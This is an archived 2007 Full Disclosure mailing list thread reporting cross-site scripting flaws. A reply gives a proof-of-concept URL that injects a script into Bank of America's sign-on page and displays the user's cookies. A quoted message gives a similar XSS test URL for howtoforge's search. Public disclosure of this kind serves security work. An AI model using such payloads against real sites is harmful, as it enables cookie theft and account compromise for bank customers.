Full Disclosure mailing list archives
Re: XSS - bank of america
From: "kevin horvath" <kevin.horvath () gmail com>
Date: Fri, 2 Nov 2007 10:47:00 -0400
even worse when its a bank. I dont usually look for it but... https://sitekey.bankofamerica.com/sas/signonScreen.do?reason=regular&msg=<script>alert("XSS_is_bad_for_business");alert(document.cookie)</script> all input from the client is evil! On 11/1/07, reepex <reepex () gmail com> wrote:
lol pdp On Nov 1, 2007 4:58 PM, Emmanouil Gavriil <emmanouilgavriil () gmail com> wrote:Cross Site Scripting at howtoforge..http://www.howtoforge.com/trip_search?keys=<script>alert('XSS-Test')</scriptEmmanouil Gavriil _______________________________________________ Full-Disclosure - We believe in it. Charter:http://lists.grok.org.uk/full-disclosure-charter.htmlHosted and sponsored by Secunia - http://secunia.com/_______________________________________________ Full-Disclosure - We believe in it. Charter: http://lists.grok.org.uk/full-disclosure-charter.html Hosted and sponsored by Secunia - http://secunia.com/
_______________________________________________ Full-Disclosure - We believe in it. Charter: http://lists.grok.org.uk/full-disclosure-charter.html Hosted and sponsored by Secunia - http://secunia.com/
Current thread:
- Re: XSS - bank of america kevin horvath (Nov 02)